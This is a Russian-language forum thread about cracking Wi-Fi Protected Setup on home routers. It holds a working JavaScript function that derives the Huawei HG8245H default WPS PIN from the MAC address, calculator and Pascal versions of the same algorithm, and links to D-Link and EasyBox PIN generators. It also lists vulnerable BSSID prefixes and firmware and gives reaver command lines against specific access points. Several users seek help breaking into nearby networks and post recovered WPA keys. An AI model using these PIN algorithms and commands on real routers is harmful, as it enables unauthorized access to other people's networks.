Уязвимость в протоколе Wi-Fi Protected Setup

Не-не, та презентация объясняет не алгоритм генерации пин кода устройства, а уязвимость ГПСЧ, позволяющая брутить пин код в оффлайн режиме, используя криптографические особенности протокола.

Второе. Именно)

Именно, чипсет здесь в общем-то не при чём. А декомпилировать не всегда нужно, многие прошивки открыты (хотя некоторые лишь частично).

Где-то здесь в этом треде или по близости мы это уже обсуждали, и даже пытались что-то найти.

 

Всем привет,пользовался airslax(reaver) и вот что получилось
WPS PIN 00000000
WPA PSK 1ysa3pjdys20hfhr420 ur9nkicur1j
AP SID SEC linkshare 861903
По даному паролю подключать не хочет,может его надо перевести по какомуто алгоитму?

 

Существует ли сейчас рабочий метод возвращения роутера из wps-блокировки? mdk3 уже не помогает, а всяких tp-link'ов вокруг дофига...

 

Подключайся по пину...

 

А я вот нашёл алгоритм генерации пин кода из MAC-адреса для роутера Huawei HG8245H.

Обнаружил его в коде веб интерфейса, он на JavaScript

Пример использования:
computeDefaultPin('20:0B:C7:C9:6E:94')

Code:

// According to wlanmac, calculate initial PIN code, algorithm HW_WLAN_CalWpsDefaultPin is the same
function computeDefaultPin(wlanMac)
{
    var mac = '';
    var temp = 0;
    var macnum = 0;
    var pin = 0;
    var defaultpin = 0;

    // Check wlanmac legitimacy
    if ((wlanMac == '') || (wlanMac == '00:00:00:00:00:00') || (wlanMac == 'FF:FF:FF:FF:FF:FF'))
    {
        alert(cfg_wlancfgdetail_language['amp_wlanmac_invaild']);
    }

    // Remove : symbols from wlanmac
    for (var i = 0; i < wlanMac.length; )
    {
        mac += wlanMac.substr(i,2);
        i += 3; 
    }

    // Take wlanmac after 7 bits and convert it to 10 hexadecimal
    for (var j = (mac.length - 1); j >= (mac.length - 7); j--)
    {
        temp = parseInt(mac.charCodeAt(j));

        if ((temp >= 97) && (temp <= 102))  //abcdef
        {
            temp = (temp - 97) + 10;
        }
        else if ((temp >= 65) && (temp <= 70))  //ABCDEF
        {
            temp = (temp - 65) + 10;
        }
        else if ((temp >= 48) && (temp <= 57))  //0123456789
        {
            temp = temp - 48;
        }
        else
        {
            alert(cfg_wlancfgdetail_language['amp_wlanmac_invaild']);
        }

        temp = temp * Math.pow(16, mac.length - j - 1);
        macnum += temp;    
    }
        
    pin = macnum % 10000000;
    if (pin == 0)
    {
        pin = 1234567;
    }

    // Add checksum
    defaultpin = pin * 10 + ComputeChecksum(pin);

    return defaultpin;
}

 

Круто, в инете прочел, что такие роутеры ставит МГТС для своего GPON. Странно, что у меня в округе только sercomm и intercross.

 

его ставили в 2012-2013,потом ему на смену пришел серком....
http://www.mgts.ru/upload/images/f/1/home/internet/equipment/modems/Huawei HG8245.pdf

 

Делаем скрипт выше на калькуляторе!
Имеем BSSID - F8:4A:BF:E1:08:EC
Открываем калькулятор и выбираем вид - программист.
Выбираем HEX. Ставим 4 или 8 байт. Вводим FE108EC.
Выбираем DEC. Жмем кнопку 'Mod' вводим с клавиатуры 10 000 000 (без пробелов) и жмем 'Enter' - Готово!

P.S. для BSSID 90:94:E4:F0:3B:F0 с пином 5743984 делаем тоже-самое но с F03BF0!

 

Алгоритм генерации пин кода, к некоторым роутерам D-Link.

http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/

 

Работает. Спасибо.
Те что подошли у меня.
BSSID

Code:

00:01:23:45:XX:XX  00:14:D1:60:XX:XX  00:14:D1:6E:XX:XX
00:14:D1:E1:XX:XX  00:14:D1:E6:XX:XX  00:18:E7:C4:XX:XX
00:18:E7:C8:XX:XX  00:18:E7:D0:XX:XX  00:18:E7:D2:XX:XX
00:18:E7:E1:XX:XX  00:18:E7:E3:XX:XX  00:18:E7:E4:XX:XX
00:18:E7:E6:XX:XX  00:18:E7:E8:XX:XX  00:18:E7:EA:XX:XX
00:18:E7:EC:XX:XX  00:18:E7:ED:XX:XX  00:18:E7:EE:XX:XX
00:18:E7:EF:XX:XX  00:18:E7:F0:XX:XX  00:18:E7:F1:XX:XX
00:18:E7:F2:XX:XX  00:18:E7:F3:XX:XX  00:18:E7:F4:XX:XX
00:18:E7:F7:XX:XX  00:18:E7:FA:XX:XX  00:18:E7:FC:XX:XX
00:18:E7:FD:XX:XX  00:18:E7:FE:XX:XX  00:19:5B:60:XX:XX
00:1C:F0:66:XX:XX  00:1C:F0:B8:XX:XX  00:1C:F0:F7:XX:XX
00:1E:58:00:XX:XX  00:1E:58:FB:XX:XX  00:21:91:08:XX:XX
00:21:91:0A:XX:XX  00:21:91:0D:XX:XX  00:21:91:14:XX:XX
00:21:91:18:XX:XX  00:21:91:D4:XX:XX  00:21:91:EE:XX:XX
00:21:91:F6:XX:XX  00:21:91:FE:XX:XX  00:22:B0:B2:XX:XX
00:22:B0:B3:XX:XX  00:22:B0:B4:XX:XX  00:22:B0:B5:XX:XX
00:24:01:28:XX:XX  00:24:01:2D:XX:XX  00:24:01:41:XX:XX
00:24:01:F1:XX:XX  00:26:5A:C3:XX:XX  00:26:5A:CC:XX:XX
00:26:5A:CF:XX:XX  00:26:5A:F5:XX:XX  00:26:5A:F9:XX:XX
00:98:98:98:XX:XX  14:D6:4D:2C:XX:XX  14:D6:4D:2D:XX:XX
14:D6:4D:2E:XX:XX  14:D6:4D:35:XX:XX  14:D6:4D:37:XX:XX
1C:7E:E5:31:XX:XX  1C:7E:E5:34:XX:XX  1C:7E:E5:38:XX:XX
1C:7E:E5:39:XX:XX  1C:7E:E5:3E:XX:XX  1C:7E:E5:40:XX:XX
1C:7E:E5:41:XX:XX  1C:7E:E5:43:XX:XX  1C:7E:E5:45:XX:XX
1C:7E:E5:4A:XX:XX  1C:7E:E5:4B:XX:XX  34:08:04:E0:XX:XX
34:08:04:E1:XX:XX  5C:D9:98:60:XX:XX  5C:D9:98:65:XX:XX
5C:D9:98:66:XX:XX  5C:D9:98:67:XX:XX  84:C9:B2:49:XX:XX
84:C9:B2:4A:XX:XX  84:C9:B2:4C:XX:XX  84:C9:B2:4D:XX:XX
84:C9:B2:4F:XX:XX  84:C9:B2:51:XX:XX  84:C9:B2:52:XX:XX
84:C9:B2:53:XX:XX  84:C9:B2:54:XX:XX  84:C9:B2:57:XX:XX
84:C9:B2:59:XX:XX  84:C9:B2:5A:XX:XX  84:C9:B2:5F:XX:XX
84:C9:B2:62:XX:XX  84:C9:B2:64:XX:XX  84:C9:B2:6C:XX:XX
84:C9:B2:6D:XX:XX  B8:A3:86:50:XX:XX  B8:A3:86:65:XX:XX
C8:BE:19:70:XX:XX  C8:BE:19:71:XX:XX  C8:D3:A3:57:XX:XX
C8:D3:A3:5E:XX:XX  C8:D3:A3:66:XX:XX CC:B2:55:D5:XX:XX

Code:

D-Link firmware: 2.09WW
D-Link firmware: 3.03RU
D-Link DIR-615, firmware: 5.11RU
D-Link DIR-400, firmware: 1.03
D-Link DIR-615, firmware: 3.03RU
D-Link DIR-615, firmware: 5.10
D-Link DIR-615, firmware: 5.10RU
D-Link DIR-615, firmware: 5.11NV
D-Link DIR-615, firmware: 5.11RU
D-Link DIR-615, hardware: B2, firmware: 2.23
D-Link DIR-615, hardware: B2, firmware: 2.25
D-Link DIR-615, hardware: B2, firmware: 2.26
D-Link DIR-615, hardware: B2, firmware: 2.27
D-Link DIR-615, hardware: E4, firmware: 5.11RU
D-Link DIR-628, hardware: A2, firmware: 1.24
D-Link DIR-628, hardware: A2, firmware: 1.25
D-Link DIR-635, hardware: B1, firmware: 2.21
D-Link DIR-635, hardware: B1, firmware: 2.33
D-Link DIR-655, firmware: 2.00
D-Link DIR-655, firmware: 2.00RU
D-Link DIR-655, hardware: A1/A2, firmware: 1.33
D-Link DIR-655, hardware: A2, firmware: 1.35
D-Link DIR-655, hardware: A3, firmware: 1.11
D-Link DIR-655, hardware: A3, firmware: 1.21
D-Link DIR-655, hardware: A3, firmware: 1.35
D-Link DIR-655, hardware: A4, firmware: 1.21
D-Link DIR-655, hardware: A4, firmware: 1.30
D-Link DIR-655, hardware: A4, firmware: 1.32
D-Link DIR-655, hardware: A4, firmware: 1.33
D-Link DIR-655, hardware: A4, firmware: 1.34
D-Link DIR-655, hardware: A4, firmware: 1.35
D-Link DIR-825, firmware: 2.05WW
D-Link DIR-825, firmware: 2.06WW
D-Link DIR-825, firmware: 2.09WW
D-Link DIR-855, hardware: A2, firmware: 1.23
D-Link DIR-855, hardware: A2, firmware: 1.24
D-Link DIR-857, firmware: 1.00
D-Link DIR-857, firmware: 1.01RU

TRENDnet firmware: 1.10
TRENDnet TEW-652BRP, firmware: 1.10
TRENDnet TEW-673GRU, firmware: 1.00

dlink DIR-826L, firmware: 1.00RUb07
dlink DIR-826L, firmware: 1.01RUb01beta01
dlink DIR-826L, firmware: 1.01RUb01beta02
dlink DIR-826L, firmware: 1.01RUb01beta04

 

Мучаю один роутер (D-Link судя по маку), три раза запускал полный перебор и три раза reaver выдавал разные, но близкие результаты (44409845, 44409920, 44410087), когда перебор заканчивается строчки WPS PSK нету. Попытка подключится по пину результатов не принесла. Как можно добить эту точку чтобы вытянуть из неё пароль?

 

Это для Huawei? Хм... в сравнении со скриптом, который я постил выше, результаты отличаются, либо я что-то делаю не так

Это D-Link DIR-620, у него самый обычный алгоритм 16 к 10.

 

Скрипт на питоне.

https://github.com/devttys0/wps/blob/master/pingens/dlink/pingen.py

 

Да для них:

Code:

48:46:FB:D2:2C:88     83233364     Huawei Technologies HG8245H
D4:6A:A8:C3:58:A4     70199406     Huawei Technologies HG8245H
F8:4A:BF:E1:08:EC     64061245     Huawei Technologies HG8245H

У них по умолчанию пин отключен и показывает 12345670 - заходил на роутер и включал пин.

Это тотже алгоритм но в нем используется 24 бита мака, а в Huawei 28 бит!

На паскале это вот-так:

Code:

s:= 'FE108EC';
pin:= StrToInt('$'+s);
pin:= pin MOD 10000000;

Этот алгоритм подошел:

Code:

ASUS RT-G32
ASUS RT-N13U Rev.B1
D-Link DIR-400, firmware: 1.00
D-Link DIR-400, firmware: 1.03
EDIMAX BR6228GNS
ZyXEL KEENETIC 4G, NDMS v1.00(BWO.0)D0
ZyXEL KEENETIC LITE, NDMS v1.00(BWN.0)D0
EDIMAX BR6258GN
EDIMAX BR6428GN
EDIMAX BR6428NS

 

Вы BSSID или лог выложите. Ато непонятно над чем колдовать.

 

Нашел скрипт:

Code:

Vodafone EasyBox Default WPS PIN Algorithm Weakness
product: EasyBox 802 & EasyBox 803

http://rghost.ru/59969467

 

BSSID: 34:08:04C:5A:18

лог от ривера
https://www.sendspace.com/file/q0cr31

 

ZyXEL KEENETIC, NDMS v1.00(BFW.4)D0

reaver -i mon0 -b 34:08:04C:5A:18 -vv -p4440984 -n
Нашел у себя несколько штук и на всех пароль 123qwe**

 

После перебора на роутере отключился wps, нету пока возможности проверить.

Помогите со второй AP:

ESSID: ZTE018
BSSID: CC:7B:35:15:F5:78

лог ривера:

https://www.sendspace.com/file/chj9yk

Несколько раз делал полный перебор, где-то в начале, но с разных мест, показывает прогресс 90%, потом доходит до 99,99% и так по кругу гоняет один пин... С этим можно что-нибудь сделать чтобы вытянуть пароль?

 

С этим помочь не могу.
А с предыдущим попробуйте:
reaver -i mon0 -b 34:08:04C:5A:18 -vv -p4440984 -n -L